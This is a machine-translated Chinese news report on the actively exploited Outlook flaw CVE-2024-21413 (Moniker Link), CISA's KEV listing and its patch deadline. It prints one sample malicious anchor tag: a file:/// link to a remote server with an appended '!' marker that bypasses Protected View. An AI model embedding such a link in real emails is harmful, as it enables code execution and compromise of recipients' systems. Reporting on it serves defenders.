網絡安全公司檢查點已經發現了Microsoft Outlook中的關鍵遠程代碼執行(RCE)漏洞,目前正在主動網絡攻擊中利用該漏洞,對全球組織構成了重大威脅。
這促使網絡安全和基礎設施安全局(CISA)警告美國聯邦機構確保其係統免受此類持續攻擊。
檢查點脆弱性研究人員Haifei li發現了所追踪的高度rce脆弱性CVE-2024–21413(CVSS得分為9.8)。
該缺陷是由於輸入驗證不當引起的,該驗證可以使用弱勢Microsoft Outlook版本打開帶有惡意鏈接的電子郵件時觸發代碼執行。
成功利用此漏洞將使威脅參與者在編輯模式而不是受保護模式下繞過辦公室受保護的視圖並打開惡意文件。
它還可以授予威脅行為者提高特權,包括讀取,寫入和刪除數據的能力。
微軟在一年前解決了CVE-2024–21413漏洞,警告預覽窗格本身可能是攻擊向量。
結果,僅在Outlook中查看惡意電子郵件可能就足以觸發利用,從而使其異常危險。
根據檢查點,攻擊者利用稱為Moniker鏈接的漏洞,該方法將Outlook欺騙到打開不安全的文件中。
這使威脅參與者可以使用文件://協議繞過嵌入在電子郵件中的惡意鏈接的內置Outlook保護措施。
攻擊者可以通過附加感嘆號,然後在文件URL上附加誘惑標記,然後將Outlook操縱以將惡意文件視為受信任的資源。
通過在URL中的文件擴展後立即插入此感嘆號標記,指向攻擊者控制的服務器以及一些隨機文本,它們可以欺騙系統並執行惡意有效載荷。
例如,攻擊者可能會製作一個鏈接,如下所示:
<a href=”file:///\\10.10.111.111\test\test.rtf!something”>點擊我</a>
當受害者單擊鏈接時,Outlook從攻擊者的服務器中檢索文件並以提高特權運行,從而授予攻擊者對系統的控制。
CVE-2024-21413漏洞已經影響了多個Microsoft Office產品,包括Microsoft Office LTSC 2021,Microsoft 365 Apps for Enterprise,Microsoft Outlook 2016和Microsoft Office 2019。
為了響應這種漏洞的主動利用,CISA已將CVE-2024-21413添加到其已知的剝削漏洞(KEV)目錄中。
根據2021年11月的約束力運營指令(BOD)22-01,聯邦機構已經有時間到2025年2月27日,以修補其係統並保護其網絡免受潛在威脅。
“這些類型的漏洞是惡意網絡參與者的頻繁攻擊向量,並向聯邦企業構成了重大風險。”警告星期四。
CVE-2024-21413在野外積極的剝削時,對Outlook用戶呈現出嚴重的安全風險。
因此,建議私人組織立即應用補丁並加強網絡安全防禦措施,以防止潛在的違規行為。